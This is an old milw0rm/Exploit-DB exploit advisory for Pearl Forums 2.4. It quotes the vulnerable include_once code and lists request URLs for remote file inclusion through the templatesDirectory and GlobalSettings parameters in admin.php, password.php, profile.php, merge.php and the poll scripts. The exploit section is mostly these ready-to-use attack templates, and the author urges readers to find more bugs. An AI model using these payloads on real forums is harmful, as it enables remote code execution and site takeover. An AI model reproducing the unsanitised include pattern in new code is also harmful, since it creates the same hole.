Pearl Forums 2.4 - Multiple Remote File Inclusions

EDB-ID:

2826

CVE:

N/A




Platform:

PHP

Date:

2006-11-21


_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main  Script Of Pearl Products
//Affected Version:2.4
//D
script:http://sourceforge.net/project/downloading.php?group_id=102974&use_mirror=switch&filename=pearlforums2.4.zip&351611
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------

 Bug in
  adressbook.php & admin.php & merge.php &
more than
 u expected files r vulnerable just try to check all files
 Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------\\

-------------------------------------------------------------------------------
 Vul Codes:
 include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
 include_once("$templatesDirectory/admin.php");

-----------------------------------------------------------------------------------
 Exploits:
 ~~~~~~~~~
 Note that more variables are not sanitized so Exploits can work
Successfuly when
 register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill
code

    And Many Bug u can discovered just download the script

-----------------------------------------------------------------------------------
    Thx To:str0ke & www.milw0rm.com & www.zone-h.com & All My Friends
    Special Gr33Ts:ASIANEAGLE & Kacper & The Master

////////////////////////////////////////////////////////////////////////////////////

# milw0rm.com [2006-11-21]